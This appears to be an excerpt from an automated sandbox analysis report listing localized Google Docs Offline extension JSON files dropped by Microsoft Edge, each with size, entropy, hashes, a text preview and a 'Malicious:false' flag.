                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1305
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.673517697192589
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):911
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.6294343834070935
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):939
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.451724169062555
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):977
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.622066056638277
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):972
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.621319511196614
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):990
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.497202347098541
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1658
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.294833932445159
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1672
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.314484457325167
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):935
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.6369398601609735
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1065
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.816501737523951
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2771
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.7629875118570055
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):858
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.474411340525479
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):954
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.6457079159286545
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):899
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.474743599345443
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2230
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.8239097369647634
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1160
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.292894989863142
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):3264
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.586016059431306
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):3235
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.6081439490236464
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):3122
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.891443295908904
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1895
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.28990403715536
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1042
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.3945675025513955
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2535
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.8479764584971368
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1028
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.797571191712988
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):994
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.700308832360794
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2091
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.358252286391144
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
                                                                                                                                                                                                                                                                                                  MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                                                                                                                                                                                                                                                                  SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                                                                                                                                                                                                                                                                  SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                                                                                                                                                                                                                                                                                  SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2778
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.595196082412897
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                                                                                                                                                                                  MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                                                                                                                                                                                  SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                                                                                                                                                                                  SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                                                                                                                                                                                  SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1719
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.287702203591075
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                                                                                                                                                                                  MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                                                                                                                                                                                  SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                                                                                                                                                                                  SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                                                                                                                                                                                  SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):936
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.457879437756106
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
